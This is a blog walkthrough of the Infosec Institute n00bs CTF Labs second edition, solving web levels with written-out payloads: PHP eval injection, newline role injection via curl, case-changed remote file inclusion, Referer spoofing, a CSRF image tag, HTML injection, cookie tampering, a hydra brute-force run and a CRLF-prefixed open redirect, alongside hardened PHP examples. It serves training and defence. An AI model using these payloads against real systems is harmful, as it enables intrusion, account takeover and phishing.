
n00bs CTF Labs by Infosec Institute – 2nd edition


Here is another edition of the n00bs CTF Labs by Infosec Institute. There are 13 levels; I will add each one as soon as I complete it, so stay tuned and keep visiting this post. Remember the first edition?

Level 2

A simple calculator. The goal is to inject something that breaks out of the PHP code and runs something like phpinfo(). After several tries against the operands with no success, I figured the operator was probably not cast or checked in any way, and this string was enough to pass the level:

;phpinfo();

This string makes eval() run our phpinfo(), even though it throws an error as well. The operator variable was not sanitized at all. A very basic mitigation would be an allowlist of operators, something like:

// Allowed operators; anything else is rejected before it can reach eval().
$operators = array("+", "-", "*", "/");
// Strict comparison: the parameter must be exactly one of these strings.
if (!isset($_GET['operator']) || !in_array($_GET['operator'], $operators, true)) {
    die('FAIL!');
}
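To make the point concrete, here is an added example (not the challenge's real source and not code from this post) of a calculator written the way the level appears to work, next to a version that does not use eval() at all. The parameter names num1, num2 and operator are assumptions.

```php
<?php
// Added example, not the challenge's source. Parameter names are assumptions.

// Vulnerable: operands and operator are glued straight into PHP source.
// With operator=;phpinfo(); the evaluated code becomes
//   $result = 1;phpinfo();2;
// which is valid PHP, so phpinfo() runs before any "result" is printed.
function calc_vulnerable(string $a, string $op, string $b)
{
    eval('$result = ' . $a . $op . $b . ';');
    return $result;
}

// Hardened: no eval(). Operands must be numeric and the operator is looked up,
// by exact string match, in a fixed table of closures.
function calc_safe(string $a, string $op, string $b): float
{
    if (!is_numeric($a) || !is_numeric($b)) {
        throw new InvalidArgumentException('operands must be numeric');
    }
    $ops = [
        '+' => fn(float $x, float $y): float => $x + $y,
        '-' => fn(float $x, float $y): float => $x - $y,
        '*' => fn(float $x, float $y): float => $x * $y,
        '/' => function (float $x, float $y): float {
            if ($y == 0.0) {
                throw new DivisionByZeroError('division by zero');
            }
            return $x / $y;
        },
    ];
    // array_key_exists() matches keys exactly, so ";phpinfo();" is rejected.
    if (!array_key_exists($op, $ops)) {
        throw new InvalidArgumentException('operator not allowed');
    }
    return $ops[$op]((float) $a, (float) $b);
}

// Request handling: any rejected input yields a 400 and the same FAIL! text,
// so the caller learns nothing about which check failed.
$a  = $_GET['num1'] ?? '1';
$op = $_GET['operator'] ?? '+';
$b  = $_GET['num2'] ?? '2';
if (!is_string($a) || !is_string($op) || !is_string($b)) {
    http_response_code(400);
    exit('FAIL!');
}
try {
    echo calc_safe($a, $op, $b), "\n";
} catch (Throwable $e) {
    http_response_code(400);
    echo 'FAIL!', "\n";
}
```

The allowlist check earlier in this post stops the injection, but leaving eval() in place means the next forgotten parameter reopens the hole; dispatching through a table of closures removes the dynamic code path entirely.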


Level 3

The hint says that we have to use a newline to get our role set to admin. We inject it after the 'lname' parameter:

$ curl "http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php" -H "Cookie: PHPSESSID=0sik0or2grffh5uqibmildtp82" -H "Connection: keep-alive" --data "user=tunelk02&password=lalala&lname=any%0aadmin&email=t%40tt.com&register=Register"

What happens here is that the registration code saves new users with the role fixed to normal user, and the login code reads the user file line by line. If we put «lname=any%0aadmin», the newline makes the registration process store us as admin. Then we just log in.
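The mechanism, as an added example that is not the challenge's real code: the on-disk format below is an assumption modelled on the payload in the comment at the end of this post (one "key:value" field per line, records separated by a blank line, and a reader that keeps the first value it meets for each key). It needs PHP 7.4 or newer.

```php
<?php
// Added example, not the challenge's real code. Storage format is an
// assumption: "key:value" per line, blank line between records, first
// occurrence of a key wins when reading. PHP 7.4+.

function write_record(array $fields, string $store): void
{
    $record = '';
    foreach (['user', 'lname', 'email'] as $name) {
        $record .= $name . ':' . $fields[$name] . "\n";
    }
    $record .= "role:user\n\n";      // the role is meant to be fixed by the server
    file_put_contents($store, $record, FILE_APPEND | LOCK_EX);
}

// Vulnerable: fields are written exactly as received. A newline inside lname
// ends that line, and whatever follows is parsed as a field of its own.
function register_vulnerable(array $fields, string $store): void
{
    write_record($fields, $store);
}

// Hardened: no CR, LF or NUL in any field, so a field can never become a line.
function register_safe(array $fields, string $store): void
{
    foreach (['user', 'lname', 'email'] as $name) {
        if (!is_string($fields[$name] ?? null) || preg_match('/[\r\n\x00]/', $fields[$name])) {
            throw new InvalidArgumentException("$name contains control characters");
        }
    }
    write_record($fields, $store);
}

// Login-side reader: walks the file line by line and returns the record for $user.
function lookup_user(string $user, string $store): ?array
{
    $current = [];
    $lines   = file($store, FILE_IGNORE_NEW_LINES) ?: [];
    $lines[] = '';                                   // make sure the last record is closed
    foreach ($lines as $line) {
        if ($line === '') {
            if (($current['user'] ?? null) === $user) {
                return $current;
            }
            $current = [];
            continue;
        }
        [$key, $value] = array_pad(explode(':', $line, 2), 2, '');
        $current[$key] ??= $value;                   // first occurrence wins
    }
    return null;
}

// Demonstration with the payload from the comment: lname=admin%0arole:admin
$store = tempnam(sys_get_temp_dir(), 'users');
$evil  = ['user' => 'tunelk02', 'lname' => "admin\nrole:admin", 'email' => 't@tt.com'];

register_vulnerable($evil, $store);
echo 'role after vulnerable registration: ', lookup_user('tunelk02', $store)['role'], "\n";

try {
    register_safe($evil, $store);
} catch (InvalidArgumentException $e) {
    echo 'safe registration rejected it: ', $e->getMessage(), "\n";
}
unlink($store);
```

With the vulnerable writer the injected "role:admin" line lands before the server's own "role:user" line, and a first-wins reader keeps the attacker's value. The fix is not a smarter parser but refusing record and line separators in any field before it is written.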

Level 4

Description says:

«You are confronted with a website that loads some .txt files to display content for its pages. You are thinking that it may be vulnerable. You aim to load a nice file from a remote server and share the link with unsuspecting visitors.
Your task is to successfully load a PHP file located in the root of infosecinstitute.com. The file should not exist but you must load it without getting errors and it must have the PHP file extension.»

So we only have to follow the instructions. Let's test with http://infosecinstitute.com/file1.txt.php:

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=http://infosecinstitute.com/file1.txt.php

This one is detected as a URL and refused. Reading the hint (case-insensitive), we notice we can change the case of a few letters in the scheme without altering the mission. PHP looks stream wrappers up case-insensitively, so HttP:// is fetched exactly like http:// but slips past a literal match:

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=HttP://infosecinstitute.com/file1.txt.php

Nice, that one goes through. Next one?
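What such a filter probably looks like, and what it should look like, as an added example (not the challenge's source): the page names and directory below are assumptions.

```php
<?php
// Added example, not the challenge's source. A page loader in the style the
// level describes (?file=... chooses a .txt to display); page names and the
// directory are assumptions.

// Vulnerable filter: a blacklist of two literal prefixes, compared case-sensitively.
// PHP lowercases the scheme before choosing a stream wrapper, so "HttP://..."
// is fetched like "http://..." yet is never caught here. ftp://, //host/ and
// php:// are not caught either: this is why blacklists lose.
function is_remote_vulnerable(string $file): bool
{
    return strpos($file, 'http://') === 0 || strpos($file, 'https://') === 0;
}

function load_page_vulnerable(string $file): string
{
    if (is_remote_vulnerable($file)) {
        return 'Remote files are not allowed';
    }
    return (string) file_get_contents($file);   // follows any wrapper, any path
}

// Hardened: the parameter is a page *name*, never a path or URL. It must be
// one of a fixed set, and the filesystem path is built server-side.
const PAGES_DIR = __DIR__ . '/pages';
const PAGES     = ['home', 'about', 'contact'];

function load_page_safe(string $page): string
{
    if (!in_array($page, PAGES, true)) {
        http_response_code(404);
        return 'No such page';
    }
    $path = PAGES_DIR . '/' . $page . '.txt';
    return is_file($path) ? (string) file_get_contents($path) : 'No such page';
}

// The two payloads from this level, against the filters only (no network access).
foreach (['http://infosecinstitute.com/file1.txt.php', 'HttP://infosecinstitute.com/file1.txt.php'] as $p) {
    printf("%-45s blocked by blacklist: %s\n", $p, is_remote_vulnerable($p) ? 'yes' : 'no');
    printf("%-45s accepted by allowlist: %s\n", $p, in_array($p, PAGES, true) ? 'yes' : 'no');
}
```

Switching the blacklist to stripos() would stop this particular bypass and nothing else; the allowlist never lets the parameter reach a filesystem or URL function at all.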


Level 5

«It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.»

If we look at the top of the page we see a disabled login button, something like this:

<a class="btn btn-sm btn-info" disabled="" href="login.html">login</a>

And if we try to access login.html, it is not found. Some of the levels, IMHO, have a very unrealistic implementation: why not put a real (but restricted) login.html that can be bypassed anyway? All that is needed to pass is a Referer header pointing at login.html, with a request like this:

$ curl -vvv http://ctf.infosecinstitute.com/ctf2/exercises/ex5.php -H "Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html"

Gosh, you were fast. You completed Level 5. You will be redirected to level 6 in 10 seconds.

Level 6

«It seems you have landed on a site that takes HTML tags for article’s comments. You want to exploit this by making the users perform an action on the bank.php file in the root of site.com, if they are logged in there. You want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter. Go ahead.»

Hey<img src="https://site.com/bank.php?transferTo=555">Visit

That is enough, and it works on my server.
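For the other side of the level, here is an added example (not site.com's code) of how bank.php would have to look so that an <img> planted in a comment no longer moves money. The parameter and session key names are assumptions.

```php
<?php
// Added example, not site.com's code. Parameter and session key names are
// assumptions.

// Session cookie is not sent on cross-site subresource loads (PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'path' => '/']);
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrf_check(): void
{
    $known = $_SESSION['csrf'] ?? '';
    $sent  = $_POST['csrf'] ?? '';
    // No token in the session means nothing can match; hash_equals() is a
    // constant-time compare and the is_string() guard keeps arrays out.
    if ($known === '' || !is_string($sent) || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('bad or missing CSRF token');
    }
}

// Vulnerable pattern: a state change on GET, no token.
//   if (isset($_GET['transferTo'])) { do_transfer((int) $_GET['transferTo']); }
// Anything that makes the browser request the URL, an <img> included, performs it.

// Hardened: state changes only on POST, only with a valid token.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    csrf_check();
    $to = filter_input(INPUT_POST, 'transferTo', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($to === false || $to === null) {
        http_response_code(400);
        exit('invalid account number');
    }
    // do_transfer($to);  // the real transfer logic is out of scope here
    exit("transfer to account $to accepted");
}
?>
<form method="post" action="bank.php">
  <input type="hidden" name="csrf" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <label>Transfer to account <input name="transferTo" inputmode="numeric"></label>
  <button>Transfer</button>
</form>
```

The comment form that accepts raw HTML is a second bug on the same site, but even with it left in place the image trick fails here: a GET does nothing, a cross-site POST has no token, and with SameSite=Lax the session cookie does not travel with the image request at all.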


Level 7

There is a hidden value reflected here. Injecting just ><h1>tunelko</h1> is not enough on its own, since the payload lands inside a quoted attribute.

It looks like a PHP_SELF-style reflection, so let's close the quote first:

'><h1>tunelko</h1>
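To show why closing the quote is what matters, here is an added example (not the challenge's source) of a form built the way this level is suspected to be, with PHP_SELF and a request parameter echoed raw into single-quoted attributes, next to the same form escaped properly. The hidden field name is an assumption.

```php
<?php
// Added example, not the challenge's source. The hidden field name is an
// assumption.

// Vulnerable: PHP_SELF includes PATH_INFO, which the client chooses, and the
// hidden field echoes a request parameter. Both land unescaped inside
// single-quoted attributes, so a value starting with '> closes the attribute
// and the tag, and whatever follows is rendered as markup.
function form_vulnerable(string $ref): string
{
    return "<form action='" . $_SERVER['PHP_SELF'] . "' method='post'>"
         . "<input type='hidden' name='ref' value='" . $ref . "'>"
         . "</form>";
}

// Escape for HTML attribute and text context. ENT_QUOTES covers both ' and ",
// so it is safe whichever quote style wraps the attribute.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened: SCRIPT_NAME instead of PHP_SELF (no client-controlled PATH_INFO),
// and every dynamic value escaped for the context it is written into.
function form_safe(string $ref): string
{
    return "<form action='" . e($_SERVER['SCRIPT_NAME']) . "' method='post'>"
         . "<input type='hidden' name='ref' value='" . e($ref) . "'>"
         . "</form>";
}

// Simulate the request this level receives. Under a web SAPI these come from
// the request; they are set by hand so the script also runs from the CLI.
$payload = "'><h1>tunelko</h1>";
$_SERVER['SCRIPT_NAME'] = '/ctf2/exercises/ex7.php';
$_SERVER['PHP_SELF']    = $_SERVER['SCRIPT_NAME'] . '/' . $payload;   // PATH_INFO appended

echo form_vulnerable($payload), "\n";
echo form_safe($payload), "\n";
```

In the vulnerable output the <h1> appears twice as live markup, once out of the action attribute and once out of the hidden value; in the escaped output both quotes become &#039; and the tags become &lt;h1&gt;, so the browser shows them as text.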


Level 11

Presented as another blacklisted part of the website, categorized as «Vulnerability: Bypassing blacklists». A message appears on the web page.


We just inspect the cookies and see one of them called 'welcome' set to no. Change it to 'yes' to bypass the 'restriction':

$ curl -vvv "http://ctf.infosecinstitute.com/ctf2/exercises/ex11.php" -H "User-Agent: tnlk" -H "Cache-Control: no-cache" -H "Cookie: welcome=yes" | grep lead

Now you can see a different message.

You did it again! Why did they blacklist you anyway?

Level 12

We need to find a password: another brute-force login. In the first edition they only gave you a hint (the word cisco) that guided you to try several combinations. This time, just google for a first dictionary with the «filetype:lst password» query.

The first result on the first page is an Openwall common-words list. How to attack this time? We can beat it several ways: hydra, Burp Intruder, ... Last time I did it with Burp, so let's switch to hydra this time. We download the Openwall dictionary into the working directory and start hydra with these parameters:

Host: ctf.infosecinstitute.com
Method: http-form-post
Form action: "/ctf2/exercises/ex12.php:username=admin&password=^PASS^&logIn=Login:Incorrect username or password combination."

Login as admin with the password file downloaded before:
-l admin -P password-2011.lst

10 parallel tasks, a 30-second wait for responses, output saved to a log file:
-t 10 -w 30 -o log

* Notice the POST parameters inside the form string, and the failure message hydra uses to recognise an incorrect login.


$ hydra ctf.infosecinstitute.com http-form-post "/ctf2/exercises/ex12.php:username=admin&password=^PASS^&logIn=Login:Incorrect username or password combination." -l admin -P password-2011.lst -t 10 -w 30 -o log

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-26 19:21:23
[DATA] max 10 tasks per 1 server, overall 64 tasks, 3546 login tries (l:1/p:3546), ~5 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: ctf.infosecinstitute.com   login: admin   password: princess
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-26 19:21:49

It finished in a few seconds. The login is admin and the password is princess.


Level 13

The text on this level says:

«Hmm, it seems that level thirteen is redirecting to this page. Why do not you analyze the redirect and search if the redirect is validated thoroughly. If not, you want to redirect to a page on a remote server and send links to people fooling them to think they are accessing a different domain.»

If you look at the menu link you can see a GET parameter called redirect. This parameter is the key to achieving what they ask for: a redirect to some page we control.

GET /ctf2/exercises/ex13.php?redirect=http://104.131.38.172/file.html HTTP/1.1

Not so fast... They are filtering the http scheme somehow, and an ugly message tells us so: Bad Redirect Parameter.

What technique can we use to bypass it? First I tried changing the case, but that does not work here. Then I remembered an old trick for servers with this kind of filter: CRLF injection, the basis of HTTP response splitting. It is just a newline, CR and LF encoded as %0d%0a, followed by a space, prefixed to the value in the GET request. As OWASP puts it on the wiki page:

Exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages.

So we try it:

http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=%0d%0a%20http://104.131.38.172/file.html

Now it works. We can also use another scheme pointing at a server we control and it works too.
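A plausible model of the filter and a proper replacement, as an added example (not the challenge's source): the vulnerable half guesses that the check runs on the raw parameter while the value is tidied up before use, which is one way a leading CR LF SPACE gets through. In real HTTP that same sequence is also a legacy header line continuation (obs-fold), which is why the %20 matters and the raw CRLF alone does not; the trim() below stands in for whichever of the two the server did. The allowlisted host is an assumption.

```php
<?php
// Added example, not the challenge's source. The "vulnerable" filter is a
// model, the allowlisted host an assumption.

// Vulnerable: "starts with http(s)://" is tested on the raw string, then the
// string is trim()med, so "\r\n http://evil/" passes the test and becomes
// "http://evil/" on its way into the Location header.
function redirect_vulnerable(string $target): string
{
    if (preg_match('#^https?://#i', $target)) {
        return 'Bad Redirect Parameter';
    }
    return 'Location: ' . trim($target);
}

const ALLOWED_REDIRECT_HOSTS = ['ctf.infosecinstitute.com'];

// Hardened: reject control characters outright, prefer same-site paths, and
// accept absolute URLs only for an allowlisted host.
function redirect_safe(string $target): string
{
    // CR, LF, NUL, tab and other control characters have no place in a URL.
    if ($target === '' || preg_match('/[\x00-\x1f\x7f]/', $target)) {
        return 'Bad Redirect Parameter';
    }
    // A single leading slash is a local path. "//host" and "/\host" are
    // scheme-relative URLs to browsers, so they are excluded.
    if ($target[0] === '/' && !preg_match('#^/[/\\\\]#', $target)) {
        return 'Location: ' . $target;
    }
    $parts = parse_url($target);
    if ($parts === false
        || !isset($parts['scheme'], $parts['host'])
        || isset($parts['user']) || isset($parts['pass'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        || !in_array(strtolower($parts['host']), ALLOWED_REDIRECT_HOSTS, true)) {
        return 'Bad Redirect Parameter';
    }
    return 'Location: ' . $target;
}

// The requests from this level, plus a local path, through both versions.
$tests = [
    'http://104.131.38.172/file.html',
    'HTTP://104.131.38.172/file.html',
    "\r\n http://104.131.38.172/file.html",
    '/ctf2/exercises/ex13.php',
];
foreach ($tests as $t) {
    printf("%-40s | %-45s | %s\n", json_encode($t), redirect_vulnerable($t), redirect_safe($t));
}
```

Run from the CLI, the table shows the modelled filter rejecting both case variants and passing the CRLF-prefixed one straight through as a clean Location, while the hardened version rejects every external target and accepts only the local path. The functions return the header text instead of calling header() so the script runs anywhere; in production the return value goes to header() and is followed by exit.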


More info: http://ctf.infosecinstitute.com/ctf2/

 

 




1 comment

0x00

July 19, 2015

Level3 changed — this should work though:

curl -X POST http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php -H "Cookie: PHPSESSID=YOURSESSIONHERE" -H "Connection: keep-alive" --data "user=YOURUSER&password=password&lname=admin%0arole:admin&email=admin%40anywhere.com&register=Register"
